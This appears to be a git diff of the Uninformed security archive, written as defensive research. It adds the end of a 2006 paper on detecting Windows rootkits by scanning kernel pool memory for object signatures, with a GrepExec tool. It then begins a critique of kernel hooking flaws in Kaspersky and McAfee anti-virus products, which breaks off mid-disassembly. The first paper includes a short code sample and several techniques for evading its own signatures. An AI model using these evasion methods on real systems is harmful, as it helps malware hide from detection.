Bits + +0x000 Ulong1 : Uint4B + +0x004 ProcessBilled : Ptr32 _EPROCESS + +0x004 PoolTag : Uint4B + +0x004 AllocatorBackTraceIndex : Uint2B + +0x006 PoolTagHash : Uint2B + +For the purposes of locating objects, the following is a breakdown of +what could be useful. Again, static refers to fields common between similar +executive objects and not all allocated POOL_HEADER structures. + + + ------------------------+------------+---------------------------------- + PreviousSize | Variable | Offset to previous pool block + PoolIndex | NotCertain | Not certain + BlockSize | Static | Size of pool block + PoolType | Static | POOL_TYPE + Ulong1 | Union | Padding, not valid + ProcessBilled | Variable | Allocator EPROCESS when no Tag specified + PoolTag | Static | Pool Tag (ULONG) + AllocatorBackTraceIndex | NotCertain | Not certain + PoolTagHash | NotCertain | Not certain + ------------------------+------------+---------------------------------- + +The POOL_HEADER contains several fields that appear to be common to similar +objects which could be used to further verify the likelihood of +locating an object of a specific type such as BlockSize, PoolType, and +PoolTag. + +In addition to the mentioned static fields, two other fields, +PreviousSize and BlockSize, can be used to validate that the currently +assumed POOL_HEADER appears to be a valid, allocated pool block and is in +one of the pool managers maintained link lists. PreviousSize and +BlockSize are multiples of the minimum pool alignment which is 8 bytes +on a 32bit system and 16 bytes on a 64bit system. These two elements supply byte offsets to the +neighboring pool blocks. + +If PreviousSize equals 0, the current POOL_HEADER should be the first +pool block in the pool's contiguous allocations. If it is not, it +should be the same as the previous POOL_HEADERs BlockSize. The +BlockSize should never equal 0 and should always be the same as the +proceeding POOL_HEADERs PreviousSize. + +The following code validates a POOL_HEADER of an allocated pool block. + +// +// Assumes BlockOffset < PAGE_SIZE +// ASSERTS Flink == Flink->Blink && Blink == Blink->Flink +// +BOOLEAN ValidatePoolBlock ( + IN PPOOL_HEADER pPoolHdr, + IN VALIDATE_ADDR pValidator +) { + BOOLEAN bReturn = FALSE; + + PPOOL_HEADER pPrev; + PPOOL_HEADER pNext; + + pPrev = (PPOOL_HEADER)((PUCHAR)pPoolHdr + - (pPoolHdr->PreviousSize * sizeof(POOL_HEADER))); + pNext = (PPOOL_HEADER)((PUCHAR)pPoolHdr + + (pPoolHdr->BlockSize * sizeof(POOL_HEADER))); + + if + (( + ( pPoolHdr == pNext ) + ||( pValidator( pNext + sizeof(POOL_HEADER) - 1 ) + && pPoolHdr->BlockSize == pNext->PreviousSize ) + ) + && + ( + ( pPoolHdr != pPrev ) + ||( pValidator( pPrev ) + && pPoolHdr->PreviousSize == pPrev->BlockSize ) + )) + { + bReturn = TRUE; + } + + return bReturn; +} + + +4.3) Object Specific Signatures + +So far a few useful signatures have been shown which apply to all +executive objects and could be used to identify them in memory. For some +cases these may be enough to be effective. However, in other cases, it +may be necessary to examine information within the object's body itself +in order to identify them. It should be noted that some objects of +interest may be clearly defined and documented while others may not be. +Furthermore, executive object definitions may vary between OS versions. +The following subsections briefly outline obvious memory signatures for +a few objects which generally are of interest when identifying +rootkit-like behavior. A few examples of object-specific signatures +will also be discussed, some of which have been used in previous work. + +4.3.1) Process Objects + +Here are just a few of the most basic EPROCESS fields which can form a +simple signature using rather predictable constant values which hold +true for all EPROCESS structures in the same system. + + -----------------------------+------------------------------------------ + Pcb.Header.Type | Dispatch header type number + Pcb.Header.Size | Size of dispatcher object + Pcb.Affinity | CPU affinity bit mask, typically CPU in system + Pcb.BasePriority | Typically the default of 8 + Pcb.ThreadQuantum | Workstations is typically 18 + ExitTime | 0 for running processes + UniqueProcessId | 0 if bitwise AND with 0xFFFF0002 + SectionBaseAddress | Typically 0x00400000 for non-system executables + InheritedFromUniqueProcessId | Same as UniqueProcessId, typically a valid running pid + Session | Unique on a per-session basis + ImageFileName | Printable ASCII, typically ending in '.exe' + Peb | 0x7FF00000 if bitwise AND with 0xFFF00FFF + SubSystemVersion | XP Service Pack 2 is 0x400 + -----------------------------+------------------------------------------ + +Note that there are several other DISPATCH_HEADERs embedded within +locks, events, timers, etc in the structure which also have a predicable +Header.Type and Header.Size. + +4.3.2) Thread Objects + +Here are just a few of the most basic ETHREAD fields which can form a +simple signature using rather predictable constant values which hold +true for all ETHREAD structures in the same system. + + + ------------------+------------------------------------------------------ + Tcb.Header.Type | Dispatch header type number + Tcb.Header.Size | Size of dispatcher object + Teb | 0x7FF00000 if bitwise AND with 0xFFF00FFF + BasePriority | Typically the default of 8 + ServiceTable | nt!KeServiceDescriptorTable(Shadow) used by RAIDE + Affinity | CPU affinity bit mask, typically CPU in system + PreviousMode | 0 or 1, which is KernelMode or UserMode + Cid.UniqueProcess | 0 if bitwise AND with 0xFFFF0002 + Cid.UniqueThread | 0 if bitwise AND with 0xFFFF0002 + ------------------+------------------------------------------------------ + +Note that there are several other DISPATCH_HEADERs embedded within +locks, events, timers, etc in the structure which also have a predicable +Header.Type and Header.Size. + + +4.3.3) Driver Objects + +A tool written previously named MODGREPPER by Joanna Rutkowska of +invisiblethings.org used a signature based approach to detect hidden +DRIVER_OBJECTs. This signature was later 'broken' by valerino described +in a rootkit.com article titled "Please don't greap me!". Listed here +are a few fields which a signature could be built upon to detect +DRIVER_OBJECTs. + + --------------+----------------------------------------------------------- + Type | I/O Subsystem structure type ID, should be 4 + Size | Size of the structure, should be 0x168 + DeviceObject | Pointer to a valid first created device object(can be NULL) + DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure + DriverName | A UNICODE_STRING structure containing the driver name + --------------+----------------------------------------------------------- + + +The following fields of the DRIVER_OBJECT can be validated by assuring +they fall within the range of a loaded driver image such that: + + +DriverStart < FIELD < DriverStart + DriverSize. + + + --------------------+---------------------------------------------------- + DriverInit | Address of DriverEntry() function + DriverUnload | Address of DriverUnload() function, can be NULL + MajorFunction[0x1c] | Dispatch handlers for IRPMJXXX, can default to ntoskrnl.exe + --------------------+---------------------------------------------------- + + +4.3.4) Device Objects + +For the DEVICE_OBJECT structure there are few static +signatures which are usable. Here are the only obvious ones. + + + -------------+---------------------------------------------------------- + Type | I/O Subsystem structure type ID, should be 3 + Size | Size of the structure, should be 0xb8 + DriverObject | Pointer to a valid driver object + -------------+---------------------------------------------------------- + +Note that the DriverObject field must be valid in order for the device +to function. + +4.3.5) Miscellaneous + +So far the memory signatures discussed have been fairly straightforward +and for the most part are simply a binary comparison with a specific +value. Later in this paper, a technique called N-depth pointer +validation will be discussed as a method of developing a more effective +signature in situations where pointer based memory signatures are +attempted to be evaded. + +Another way of considering an object field as a signature is to validate +it in terms of its characteristics instead of by its value. A common +example of this would be to validate an object field LIST_ENTRY. +Validating a LIST_ENTRY structure can be done as follows: + + +Entry == Entry->Flink->Blink == Entry->Blink->Flink. + + +A pointer to any object or memory allocation can also be checked using +the function shown previously, named ValidatePoolBlock. Even a +UNICODE_STRING.Buffer can be validated this way provided the allocation +is less than PAGE_SIZE. + + +5) Found An Object, Now What? + +The question of what to do after potentially identifying an executive +object through a signature depends on what the underlying goal is. For +the purpose of a the sample utility included with this paper, the goal +may be to simply display some information about the objects as it finds +them. + +In the context of a rootkit detector, however, there may be many more +steps that need to be taken. For example, consider a detector looking +for EPROCESS blocks which have been unlinked from the process linked +list or a driver module hidden from the system service API. In order to +determine this, some cross-view comparisons of the raw objects detected +and the output from an API call or a list enumeration is needed. +Detectors must also take into consideration the race condition of an +object being created or destroyed in between the memory enumeration and +the acquisition of the "known to the system" data. + +Additionally, it may be desired that some additional sanity checks be +performed on these objects in addition to the signature. Do the object +fields x,y,z contain valid pointers? Is field c equal to b? Does this +object appear to be valid however has signs of tampering in order to +hide it? Does the number of detected objects match up with a global +count value such as the one maintained in an OBJECT_TYPE structure? The +following sections will briefly mention some random thoughts of what to +do with a suspected object of the four types previously mentioned in +this paper in Chapter 4. + + +5.1) Process Objects + +Here is a brief list of things to check when scanning for EPROCESS +objects. + + 1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot. + 2. Compare against a system call such as nt!NtQuerySystemInformation. + 3. Compare against the EPROCESS->ActiveProcessLinks list. + 4. Does the process have a valid list of threads? + 5. Can PsLookupProcessByProcessId open its + 6. UniqueProcessId? + 7. Is ImageFileName a valid string? zeroed? garbage? + +5.2) Thread Objects + +Here is a brief list of things to check when scanning for ETHREAD +objects. + + 1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot. + 2. Compare against a system call such as nt!NtQuerySystemInformation. + 3. Does the process have a valid owning process? + 4. Can PsLookupThreadByThreadId open its + 5. Cid.UniqueThread? + 6. What does Win32StartAddress point to? Is it a valid module address? + 7. What is its ServiceTable value? + 8. If it is in a wait state, for how long? + 9. Where is its stack? What does its stack trace look like? + + +5.3) Driver Objects + +Here is a brief list of things to check when scanning for DRIVER_OBJECT +objects. + + 1. Compare against services found in the service control manager database. + 2. Compare against a system call such as nt!NtQuerySystemInformation. + 3. Is the object in the global system namespace? + 4. Does the driver own any valid device objects? + 5. Does the drive base address point to a valid MZ header? + 6. Do the object's function pointer fields look correct? + 7. Does DriverSection point to a valid nt!LDRDATATABLEENTRY? + 8. Does DriverName or the + 9. LDR_DATA_TABLE_ENTRY have valid strings? zeroed? garbage? + + +5.4) Device Objects + +Here is a brief list of things to check when scanning for DEVICE_OBJECT +objects. + + 1. Is the owning driver object valid? + 2. Is the device named and is it mapped into the global namespace? + 3. Does it appear to be in a valid device stack? + 4. Are its Type and Size fields correct? + + +6) Breaking Signatures + +Memory signatures can be an effective method of identifying allocated +objects and can serve as a low level baseline in order to detect objects +hidden by several different methods. Although the memory signature +detection method may be effective, it doesn't come without its own set +of problems. Many signatures can be evaded using several different +techniques and non-evadable signatures for objects, if any exist, have +yet to be explored. The following sections discuss issues and counter +measures related to defeating memory signatures. + + +6.1) Pointer Based Signatures + +Using a memory signature which is a valid pointer to some common object +or static data is a very appealing signature to use for detection due to +its reliability, however is also an easy signature to bypass. The +following demonstrates the most simplistic method of bypassing the +OBJECT_HEADER->Type signature this paper uses as a generic object memory +signature. This is possible because the OBJECT_TYPE is just an allocated +structure of fairly stable data. Many pointer based signatures with +similar static characteristics are open to the same attack. + + +NTSTATUS KillObjectTypeSignature ( + IN PVOID Object +) +{ + NTSTATUS ntStatus = STATUS_SUCESS; + PVOID pDummyObject; + POBJECT_HEADER pHdr; + + pHdr = OBJECT_TO_OBJECT_HEADER( Object ); + + pDummyObject = ExAllocatePool( sizeof(OBJECT_TYPE) ); + + RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) ); + + pHdr->Type = pDummyObject; + + return STATUS_SUCCESS; +} + + +6.2) N-Depth Pointer Validation + +As demonstrated in the previous section, pointer based signatures are +effective. However, in some cases, they may be trivial to bypass. The +following code demonstrates an example which does what this paper refers +to as N-depth pointer validation in an attempt to create a more complex, +and potentially more difficult to bypass, signature using pointers. The +following example is also evadable using the same principal of +relocation shown above. + +The algorithm assumes a given address is an executive object and +attempts validation by performing the following steps: + + 1. Calculates an assumed OBJECT_HEADER + 2. Assumes pObjectHeader->Type is an OBJECT_TYPE + 3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE + 4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType + 5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType + + +BOOLEAN ValidateNDepthPtrSignature ( + IN PVOID Address, + IN VALIDATE_ADDR pValidate +) +{ + PVOID pObject; + POBJECT_TYPE pTypeObject; + POBJECT_HEADER pHdr; + + pHdr = OBJECT_TO_OBJECT_HEADER( Address ); + + if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE; + + // Assume this is the OBJECT_TYPE for this assumed object + pTypeObject = pHdr->Type; + + // OBJECT_TYPE's have headers too + pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject ); + + if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE; + + // OBJECT_TYPE's have an OBJECT_TYPE of nt!ObpTypeObjectType + pTypeObject = pHdr->Type; + + if( ! pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE; + + // \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType + if( pTypeObject->TypeInfo.DeleteProcedure + != nt!ObpDeleteObjectType ) return FALSE; + + return TRUE; +} + + +6.3) Miscellaneous + +An obvious method of preventing detection from memory scanning would be +to use what is commonly referred to as the Shadow Walker memory +subversion technique. If virtual memory is unable to be read then of +course a memory scan will skip over this area of memory. In the context +of pool memory, however, this may not be an easy attack since it may +create a situation where the pool appears corrupted which could lead to +crashes or system bugchecks. Of course, attacking a function like +nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the +import address table of the detector itself would work. + +For memory signatures based on constant or predicable values it may be +feasible to either zero out or change these fields and not disturb +system operation. For example take the author's enhancements to the FUTo +rootkit where it is seen that the EPROCESS->UniqueProcessId can be +safely cleared to 0 or previously mentioned rootkit.com article titled +"Please don't greap me!" which clears DRIVER_OBJECT->DriverName and its +associated buffer in order to defeat MODGREPPER. + +For the case of some pointer signatures a simple binary comparison may +not be enough to validate it. Take the above example and using +nt!ObpDeleteObjectType. This could be defeated by overwriting +pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump +trampoline which is allocated elsewhere which simple jumps back to +nt!ObpDeleteObjectType. + + +7) GrepExec: The Tool + +Included with this paper is a proof-of-concept tool complete with source +which demonstrates scanning the pool for signatures to detect executable +objects. Objects detected are DRIVER_OBJECT, DEVICE_OBJECT, EPROCESS, +and ETHREAD. The tool does nothing to determine if an object has been +attempted to be hidden in any way. Instead, it simply displays found +objects to standard output. At this time the author has no plans to +continue work with this specific tool, however, there are plans to +integrate the memory scanning technique into another project. The source +code for the tool can be easily modified to detect other signatures +and/or other objects. + +7.1) The Signature + +For demonstration purposes the signature used is simple. All objects are +allocated in NonPagedPool so only non-paged memory is enumerated for the +search. The signature is detected as follows: + + 1. Enumeration is performed by assuming the start of a pool block. + 2. The signature offset is added to this pointer. + 3. The assumed signature is compared with the OBJECT_HEADER->Type + for the object type being searched for. + 4. The assumed POOL_HEADER->PoolType is compared to the objects known + pool type. + 5. The assumed POOL_HEADER is validated using the function + from section , ValidatePoolBlock. + + +The following is the function which sets up the parameters in order to +perform the pool enumeration and validation of a block by a single PVOID +signature. On a match, a callback is made using the pointer to the start +of the matching block. As an alternative to the PVOID signature, the +poolgrep.c code can easily be modified to accept either a structure to +several signatures and offsets or a validation function pointer in order +to perform a more complex signature validation. + + +NTSTATUS ScanPoolForExecutiveObjectByType ( + IN PVOID Object, + IN FOUND_BLOCK_CB Callback, + IN PVOID CallbackContext +) { + NTSTATUS ntStatus = STATUS_SUCCESS; + POBJECT_HEADER pObjHdr; + PPOOL_HEADER pPoolHdr; + ULONG_PTR blockSigOffset; + ULONG_PTR blockSignature; + + pObjHdr = OBJECT_TO_OBJECT_HEADER( Object ); + pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr ); + blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr + + OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr); + blockSignature = (ULONG_PTR)pObjHdr->Type; + + (VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1, + 0, // pPoolHdr->PoolTag OPTIONAL, + blockSigOffset, + blockSignature, + Callback, + CallbackContext ); + return ntStatus; +} + + +7.2) Usage + +GrepExec usage is pretty straightforward. Here is the output of the +help command. + +********************************************************** + GREPEXEC 0.1 * Grepping executive objects from the pool * + Author: bugcheck + Built on: May 30 2006 +********************************************************** + +Usage: grepexec.exe [options] + + --help, -h Displays this information + --install, -i Manually install driver + --uninstall, -u Manually uninstall driver + --status, -s Display installation status + --process, -p GREP process objects + --thread, -t GREP thread objects + --driver, -d GREP driver objects + --device, -e GREP device objects + + +7.3) Sample Output + +The standard output is also straight forward. Here is a sample of each +supported command. + +C:\grepexec>grepexec.exe -p +EPROCESS=81736C88 CID=0354 NAME: svchost.exe +EPROCESS=8174E238 CID=0634 NAME: explorer.exe +EPROCESS=81792020 CID=027c NAME: winlogon.exe +... + +C:\grepexec>grepexec.exe -t +EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe +EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe +EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System +EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe +... + +C:\grepexec>grepexec.exe -d +DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS +DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk +DRIVER=81725DA0 BASE=00000000 \Driver\Win32k +DRIVER=81771880 BASE=F9EB4000 \Driver\Beep + ... + +C:\grepexec>grepexec.exe -e +DEVICE=81733860 \Driver\IpNat NAME: IPNAT +DEVICE=81738958 \Driver\Tcpip NAME: Udp +DEVICE=817394B8 \Driver\Tcpip NAME: RawIp +DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer +... + + +8) Conclusion + +From reading this paper the reader should have a good understanding of +the concepts and issues related to scanning memory for signatures in +order to detect objects in the system pool. The reader should be able +to enumerate system memory safely, construct their own customized memory +signatures, locate signatures in memory, and implement their own +reporting mechanism. + +It is obvious that object detection using memory scanning is no exact +science. However, it does provide a method which, for the most part, +interacts with the system as little as possible. The +author believes that the outlined technique can be successfully +implemented to obtain acceptable results in detecting objects hidden by +rootkits. + + +Bibliography + +Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination. +http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf; +Accessed May. 30, 2006. + +F-Secure. Blacklight. +http://www.f-secure.com/blacklight/; +Accessed May. 30, 2006. + +Invisiblethings.org. MODGREPPER. +http://www.invisiblethings.org/tools.html; +Accessed May. 30, 2006. + +Phrack.org. Shadow Walker. +http://www.phrack.org/phrack/63/p63-0x08_Raising_The_Bar_For_Windows_Rootkit_Detection.txt; +Accessed May. 30, 2006. + +Rootkit.com. FU. +http://rootkit.com/project.php?id=12; +Accessed May. 30, 2006. + +Rootkit.com. Please don't greap me!. +http://rootkit.com/newsread.php?newsid=316; +Accessed May. 30, 2006. + +Uninformed.org. futo. +http://uninformed.org/?v=3&a=7&t=sumry; +Accessed May. 30, 2006. + +Windows Hardware Developer Central. Debugging Tools for Windows. +http://www.microsoft.com/whdc/devtools/debugging/default.mspx; +Accessed May. 30, 2006. diff --git a/uninformed/4.8.txt b/uninformed/4.8.txt new file mode 100644 index 0000000..cd85455 --- /dev/null +++ b/uninformed/4.8.txt @@ -0,0 +1,2070 @@ +What Were They Thinking? +Anti-Virus Software Gone Wrong +Skywing +skywing@valhallalegends.com + +0. Foreword + +Abstract: Anti-virus software is becoming more and more prevalent on end-user +computers today. Many major computer vendors (such as Dell) bundle anti-virus +software and other personal security suites in the default configuration of +newly-sold computer systems. As a result, it is becoming increasingly important +that anti-virus software be well-designed, secure by default, and interoperable +with third-party applications. Software that is installed and running by +default constitutes a prime target for attack and, as such, it is especially +important that said software be designed with security and interoperability in +mind. In particular, this article provides examples of issues found in +well-known anti-virus products. These issues range from not properly validating +input from an untrusted source (especially within the context of a kernel +driver) to failing to conform to API contracts when hooking or implementing an +intermediary between applications and the underlying APIs upon which they rely. +For popular software, or software that is installed by default, errors of this +sort can become a serious problem to both system stability and security. Beyond +that, it can impact the ability of independent software vendors to deploy +functioning software on end-user systems. + +1. Introduction + +In today's computing environment, computer security is becoming a more and more +important role. The Internet poses unique dangers to networked computers, as +threats such as viruses, worms, and other malicious software become more and +more common. + +As a result, there has been a shift towards including personal security +software on most new computers sold today, such as firewall software and +anti-virus software. Many new computers are operated and administered by +individuals who are not experienced or savvy with the administration of a +secure system, and as such rely solely on the protection provided by a firewall +or anti-virus security suite. + +Given this, one would expect that firewall, anti-virus, and other personal +security software would be high quality - after all, for many individuals, +firewall and anti-virus software are the first (and all-too-often only) line +of defense. + +Unfortunately, though, most common anti-virus and personal firewall software is +full of defects that can at best make it very difficult to interoperate with +(which turns out to be a serious problem for most software vendors, given how +common anti-virus and firewall software is), and at worst compromise the very +system security they advertise to protect. + +This article discusses two personal security software packages that suffer from +problems that make it difficult to interoperate with the software, or even +compromise system security, all due to shortcuts and unsafe assumptions made by +the original developers. + +- Kaspersky Internet Security Suite 5.0 +- McAfee Internet Security Suite 2006 + +Both of these software packages include several personal security programs, +including firewall and anti-virus software. + + +2. The problem: Kaspersky Internet Security Suite 5.0 + +Kaspersky ships a personal security software suite known as Kaspersky Internet +Security Suite 5.0. This package includes various personal security software +programs, including a firewall and anti-virus software. + +Kaspersky's anti-virus software is the primarily focus of this article. Like +many other anti-virus software, Kaspersky Anti-Virus provides both manual and +real-time scanning capabilities. + +Kaspersky's anti-virus system (KAV) employs various unsafe techniques in its +kernel mode components, which may lead to a compromise of system security. + +2.1. Patching system services at runtime. + +Although KAV appears to use a filesystem filter, the standard Windows mechanism +for intercepting accesses to files (specifically designed for applications like +anti-virus software), the implementors also used a series of API-level function +hooks to intercept various file accesses. Performing function hooking in +kernel mode is a dangerous proposition; one must be very careful to fully +validate all parameters if a function could be called from user mode (otherwise +system security could be compromised by a malicious unprivileged program). +Additionally, it is generally not safe to remove code hooks in kernel mode as +it is difficult to prove that no threads will be running a particular code +region in order to unhook without risking bringing down the system. KAV also +hooks several other system services in a misguided attempt to "protect" its +processes from debuggers and process termination. + +Unfortunately, the KAV programmers did not properly validate parameters passed +to hooked system calls, opening holes that, at the very least, allow unprivileged +user mode programs to bring down the system, and may even allow local privilege +escalation (though the author has not spent the time necessary to prove whether +such is possible). + +KAV hooks the following system services (easily discoverable in WinDbg by +comparing nt!KeServiceDescriptorTableShadow on a system with KAV loaded with a +clean system: + + +kd> dps poi ( nt!KeServiceDescriptorTableShadow ) l dwo ( nt!KeServiceDescriptorTableShadow + 8 ) +8191c9c8 805862de nt!NtAcceptConnectPort +8191c9cc 8056fded nt!NtAccessCheck +. +. +. +8191ca2c f823fd00 klif!KavNtClose +. +. +. +8191ca84 f823fa20 klif!KavNtCreateProcess +8191ca88 f823fb90 klif!KavNtCreateProcessEx +8191ca8c 80647b59 nt!NtCreateProfile +8191ca90 f823fe40 klif!KavNtCreateSection +8191ca94 805747cf nt!NtCreateSemaphore +8191ca98 8059d4db nt!NtCreateSymbolicLinkObject +8191ca9c f8240630 klif!KavNtCreateThread +8191caa0 8059a849 nt!NtCreateTimer +. +. +. +8191cbb0 f823f7b0 klif!KavNtOpenProcess +. +. +. +8191cc24 f82402f0 klif!KavNtQueryInformationFile +. +. +. +8191cc7c f8240430 klif!KavNtQuerySystemInformation +. +. +. +8191cd00 f82405e0 klif!KavNtResumeThread +. +. +. +8191cd58 f82421f0 klif!KavNtSetInformationProcess +. +. +. +8191cdc0 f8240590 klif!KavNtSuspendThread +. +. +. +8191cdcc f82401c0 klif!KavNtTerminateProcess + + + +Additionally, KAV attempts to create several entirely new system services as a +shortcut for calling kernel mode by patching the service descriptor table. +This is certainly not the preferred mechanism to allow a user mode program to +communicate with a driver; the programmers should have used the conventional +IOCTL interface, which avoids the pitfalls of patching kernel structures at +runtime and having to deal with other inconveniences such as system service +ordinals changing from OS release to OS release. + +2.2. Improper validation of user mode pointers, assuming the size of the kernel + address space. + +Many of the hooks that KAV installs (and even the custom system services) +suffer from flaws that are detrimental to the operation of the system. + +For instance, KAV's modified NtOpenProcess attempts to determine if a user +address is valid by comparing it to the hardcoded value 0x7FFF0000. On most +x86 Windows systems, this address is below the highest user address (typically +0x7FFEFFFF). However, hardcoding the size of the kernel address space is not a +very good idea; there is a boot parameter `/3GB' that can be set in boot.ini in +order to change the default address space split of 2GB kernel and 2GB user to +1GB kernel and 3GB user. If a system with KAV is configured with /3GB, it is +expected that anything that calls NtOpenProcess (such as the win32 OpenProcess) +may randomly fail if parameter addresses are located above the first 2GB of the +user address space: + + .text:F82237B0 ; NTSTATUS __stdcall KavNtOpenProcess(PHANDLE ProcessHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PCLIENT_ID ClientId) + .text:F82237B0 KavNtOpenProcess proc near ; DATA XREF: sub_F82249D0+BFo + . + . + . + .text:F8223800 cmp eax, 7FFF0000h ; eax = ClientId + .text:F8223805 jbe short loc_F822380D + .text:F8223807 + .text:F8223807 loc_F8223807: ; CODE XREF: KavNtOpenProcess+4Ej + .text:F8223807 call ds:ExRaiseAccessViolation + + +The proper way to perform this validation would have been to use the documented +ProbeForRead function with a SEH frame, which will automatically raise an +access violation if the address is not a valid user address. + +Additionally, many of KAV's custom system services do not properly validate +user mode pointer arguments, which could be used to bring down the system: + + +.text:F8222BE0 ; int __stdcall KAVService10(int,PVOID OutputBuffer,int) +.text:F8222BE0 KAVService10 proc near ; DATA XREF: .data:F8227D14o +.text:F8222BE0 +.text:F8222BE0 arg_0 = dword ptr 4 +.text:F8222BE0 OutputBuffer = dword ptr 8 +.text:F8222BE0 arg_8 = dword ptr 0Ch +.text:F8222BE0 +.text:F8222BE0 mov edx, [esp+OutputBuffer] +.text:F8222BE4 push esi +.text:F8222BE5 mov esi, [esp+4+arg_8] +.text:F8222BE9 lea ecx, [esp+4+arg_8] +.text:F8222BED push ecx ; int +.text:F8222BEE mov eax, [esi] ; Unvalidated user mode pointer access +.text:F8222BF0 mov [esp+8+arg_8], eax +.text:F8222BF4 push eax ; OutputBufferLength +.text:F8222BF5 mov eax, [esp+0Ch+arg_0] +.text:F8222BF9 push edx ; OutputBuffer +.text:F8222BFA push eax ; int +.text:F8222BFB call sub_F821F9A0 ; This routine internally assumes that all pointer parameters given are valid. +.text:F8222C00 mov edx, [esi] +.text:F8222C02 mov ecx, [esp+4+arg_8] +.text:F8222C06 cmp ecx, edx +.text:F8222C08 jbe short loc_F8222C13 +.text:F8222C0A mov eax, 0C0000173h +.text:F8222C0F pop esi +.text:F8222C10 retn 0Ch +.text:F8222C13 ; --------------------------------------------------------------------------- +.text:F8222C13 +.text:F8222C13 loc_F8222C13: ; CODE XREF: KAVService10+28j +.text:F8222C13 mov [esi], ecx +.text:F8222C15 pop esi +.text:F8222C16 retn 0Ch +.text:F8222C16 KAVService10 endp + + +.text:F8222C20 KAVService11 proc near ; DATA XREF: .data:F8227D18o +.text:F8222C20 +.text:F8222C20 arg_0 = dword ptr 4 +.text:F8222C20 arg_4 = dword ptr 8 +.text:F8222C20 arg_8 = dword ptr 0Ch +.text:F8222C20 +.text:F8222C20 mov edx, [esp+arg_4] +.text:F8222C24 push esi +.text:F8222C25 mov esi, [esp+4+arg_8] +.text:F8222C29 lea ecx, [esp+4+arg_8] +.text:F8222C2D push ecx +.text:F8222C2E mov eax, [esi] ; Unvalidated user mode pointer access +.text:F8222C30 mov [esp+8+arg_8], eax +.text:F8222C34 push eax +.text:F8222C35 mov eax, [esp+0Ch+arg_0] +.text:F8222C39 push edx +.text:F8222C3A push eax +.text:F8222C3B call sub_F8214CE0 ; This routine internally assumes that all pointer parameters given are valid. +.text:F8222C40 test eax, eax +.text:F8222C42 jnz short loc_F8222C59 +.text:F8222C44 mov ecx, [esp+4+arg_8] +.text:F8222C48 mov edx, [esi] +.text:F8222C4A cmp ecx, edx +.text:F8222C4C jbe short loc_F8222C57 +.text:F8222C4E mov eax, STATUS_INVALID_BLOCK_LENGTH +.text:F8222C53 pop esi +.text:F8222C54 retn 0Ch +.text:F8222C57 ; --------------------------------------------------------------------------- +.text:F8222C57 +.text:F8222C57 loc_F8222C57: ; CODE XREF: KAVService11+2Cj +.text:F8222C57 mov [esi], ecx +.text:F8222C59 +.text:F8222C59 loc_F8222C59: ; CODE XREF: KAVService11+22j +.text:F8222C59 pop esi +.text:F8222C5A retn 0Ch +.text:F8222C5A KAVService11 endp + + +2.3. Improper validation of user mode structures and pointers, hiding threads + from user mode. + +KAV's errors with hooking do not end with NtOpenProcess, however. One of the +system services KAV hooks is NtQuerySystemInformation, which is modified to +sometimes truncate a thread listing from certain processes when the +SystemProcessesAndThreads information class is requested. This is the +underlying mechanism for user mode to receive a process and thread listing of +all programs running in the system, and in effect provides a means for KAV to +hide threads from user mode. The very fact that this code exists at all in KAV +is curious; hiding running code from user mode is typically something that is +associated with rootkits and not anti-virus software. + +Besides the potentially abusive behavior of hiding running code, this hook +contains several security flaws: + +1. It uses the user mode output buffer from NtQuerySystemInformation after it + has been filled by the actual kernel implementation, but it does not guard + against a malicious user mode program modifying this buffer or even freeing + it. There is no SEH frame wrapping this function, so a user mode program + could cause KAV to touch freed memory. + +2. There is no validation of offsets within the returned output buffer to + ensure that offsets do not refer to memory outside of the output buffer. + This is problematic, because the returned data structure is actually a list + of sub-structures that must be walked by adding an offset supplied as part + of a particular substructure to the address of that substructure in order to + reach the next substructure. Such an offset could be modified by user mode + to actually point into kernel memory. Because the hook then sometimes + writes data into what it believes is the user mode output buffer, this is an + interesting avenue to explore for gaining kernel privileges from an + unprivileged user mode function. + +.text:F8224430 ; NTSTATUS __stdcall KavNtQuerySystemInformation(SYSTEM_INFORMATION_CLASS SystemInformationClass,PVOID SystemInformation,ULONG SystemInformationLength,PULONG ReturnLength) +.text:F8224430 KavNtQuerySystemInformation proc near ; DATA XREF: sub_F82249D0+17Bo +.text:F8224430 +.text:F8224430 var_10 = dword ptr -10h +.text:F8224430 var_C = dword ptr -0Ch +.text:F8224430 var_8 = dword ptr -8 +.text:F8224430 SystemInformationClass= dword ptr 4 +.text:F8224430 SystemInformation= dword ptr 8 +.text:F8224430 SystemInformationLength= dword ptr 0Ch +.text:F8224430 ReturnLength = dword ptr 10h +.text:F8224430 arg_24 = dword ptr 28h +.text:F8224430 +.text:F8224430 mov eax, [esp+ReturnLength] +.text:F8224434 mov ecx, [esp+SystemInformationLength] +.text:F8224438 mov edx, [esp+SystemInformation] +.text:F822443C push ebx +.text:F822443D push ebp +.text:F822443E push esi +.text:F822443F mov esi, [esp+0Ch+SystemInformationClass] 